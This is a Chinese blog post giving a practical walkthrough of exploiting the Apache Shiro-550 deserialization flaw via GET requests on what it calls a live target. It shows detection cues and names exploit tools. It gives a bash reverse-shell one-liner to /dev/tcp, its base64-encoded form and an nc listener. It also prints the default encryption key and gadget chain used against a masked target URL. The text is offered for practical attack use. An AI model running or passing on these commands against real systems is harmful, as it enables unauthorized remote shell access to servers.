shiro550-get型漏洞（验证+利用+反弹shell)

万海旭 • 2023-01-02 • 云技术社区 • 281 阅读

分享了Shiro550-POST型漏洞利用技巧，分享下get型实战技巧

一般shiro550的get型隐患点不固定，如非登录口，伪静态页面可能都存在。简单经验归纳为靠近登录口的页面点和目标主站页面有可能存在

工具：飞鸿shiro检测v2.1

Shiro的利用不仅post数据包可以使用，get请求同样可以。使用界面工具可以看到返回特点：

认证不成功（账号密码错误），返回包会返回deleteMe=
认证成功（账号密码错误），返回包会返回rememberMe=

Bash编码网站http://www.jackson-t.ca/runtime-exec-payloads.html，

因为目标是linux系统，因此使用bash将其shell反弹过来：

将

bash -i >& /dev/tcp/XXX.XXX.XXX.XXX/9999 0>&1

使用bash加密为

bash -c {echo,XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX=}|{base64,-d}|{bash,-i}

nc -lvvp 9999    //端口进行监听

V2.2版本飞鸿工具直接getshell

https://github.com/feihong-cs/ShiroExploit/releases

http://XXX.XXX.XXX.XXX:88/tenement/a/login

[*] Using Key kPH+bIxk5D2deZiIxcaaaA==
[*] Using Gadget CommonsBeanutils1

经过确认，这个实战目标Shell是通过反弹回不来的，需要通过带外攻击OOB截取返回包获取shell，下篇分享OOB

本站文章资源均来源自网络，除非特别声明，否则均不代表站方观点，并仅供查阅，不作为任何参考依据！
如有侵权请及时跟我们联系，本站将及时删除！
如遇版权问题，请查看本站版权声明

THE END

二维码

海报

shiro550-get型漏洞（验证+利用+反弹shell)

一般shiro550的get型隐患点不固定，如非登录口，伪静态页面可能都存在。简单经验归纳为靠近登录口的页面点和目标主站页面有可能存在

一次大数据分析模型实践分享

PWA 实践/应用（Google Workbox）

下一篇>>

作者信息

搜索内容